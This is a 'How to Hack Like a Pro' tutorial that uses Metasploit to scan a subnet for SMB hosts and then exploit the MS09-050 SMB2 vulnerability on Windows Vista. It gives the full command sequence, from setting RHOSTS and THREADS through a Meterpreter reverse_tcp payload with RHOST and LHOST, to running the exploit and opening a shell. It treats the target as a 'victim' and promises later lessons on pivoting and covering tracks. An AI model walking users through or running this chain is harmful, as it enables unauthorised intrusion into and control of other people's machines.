How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities


Hi, gang! Time for another hack using Metasploit.

We have exploited Windows XP (a very insecure operating system) and we have exploited Ubuntu and installed Meterpreter on a Linux system exploiting the Samba service. Several of you have asked for a hack on more modern Windows systems, so here goes.

In this module, we hack into Windows Vista or Windows Server 2008 using a vulnerability found in SMB2. As you know, SMB2 is an application level protocol used to share files, folders and printers on Windows systems. SMB2 is the revised version of Microsofts SMB that was introduced in 2006 and is used in Windows Vista and Windows Server 2008 (SMB and SMB2 have been plagued with security vulnerabilities from the very beginning).

So lets get started. Boot up your Linux operating system, open a terminal, and load the Metasploit Framework.

Step 1: Scanning the Network for SMB2

Before we begin to exploit, we need to scan the network to find the SMB identifiers for the systems we want to hack. Metasploit has multiple auxiliary modules that can help us with many of the preliminary tasks of hacking, such as scanning our victim network to obtain necessary information. In this case, we will use the auxiliary module scanner/smb/smb_version to scan the network.

msf > use scanner/smb/smb_version

Step 2: Seeing Our Options

Next, we need to see our options.

msf auxiliary(smb_version) > show options

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

Notice from the screen capture that Metasploit displays our options for this auxiliary module.

Step 3: Setting Our Options

Note here that we need to set our RHOSTS and THREADS. We set our RHOSTS to our targeted address range, in this case 192.168.1.0 through 192.168.1.255 (yours may be different depending upon your network).

msf auxiliary(smb_version) > set RHOSTS 192.168.1.0-192.168.1.255
RHOSTS => 192.168.1.0- 192.168.1.255

We then set the number of concurrent threads to 50.

msf auxiliary(smb_version) > set THREADS 50
THREADS => 50

By typing show options again, we can see that Metasploit has set our options as we have defined them.

msf auxiliary(smb_version) > show options

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

If we have done everything correctly, Metasploit will show that we have set our options properly.

Step 4: Scanning for SMB2

Next, we need to run our SMB scan on the network.

msf auxiliary(smb_version) > run

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

We can see that this scan returns results on all the machines on the defined network giving us critical information on the operating system version, the service pack, and the computer name. In my screenshot example, I have just one computer on the network and the scan correctly identifies the operating system, the service pack, and the computer name.

Step 5: Setting Up Our Exploit Module

Now that we know there are systems available that are using SMB, we can load the appropriate module in Metasploit, in this case ms09_050_smb2_negotiate_func_index.

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

To learn more about this exploit module, we can simply type info.

msf exploit(ms09050_smb2_negotiate_func_index) > info

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

As you can see in the screenshot above, Metasploit provides us critical background information on this exploit.

Step 6: Setting Up Our Payload

Now we set our payload to the Windows.

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

We then need to set the RHOST…

msf exploit(ms09050_smb2_negotiate_func_index) > set RHOST 192.168.1.100
RHOST => 192.168.1.100

And LHOST.

msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.1.111
LHOST => 192.168.1.111

Step 7: Checking Our Payload Options

We need to check to make certain our options are set properly by typing show options.

msf exploit(ms09_050_smb2_negotiate_func_index) > show options

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

Step 8: Exploiting the Vista Box

Finally, we exploit SMB2 on the Vista system.

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities

Step 9: Using the Meterpreter

The Vista system then returns a Meterpreter prompt and we type sysinfo.

meterpreter > sysinfo

Computer: PUPEN-SNOWBLACK
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

We then type shell to get a shell on our victim system.

meterpreter > shell

You have now successfully hacked the Windows Vista box. If this hack doesn’t work the first time, try again. Hacking is often a matter of probabilities and all hacks don’t work all the time.

Look for future how-to articles on using the Meterpreter to control the owned box, using it to pivot attacks from, and cover your tracks.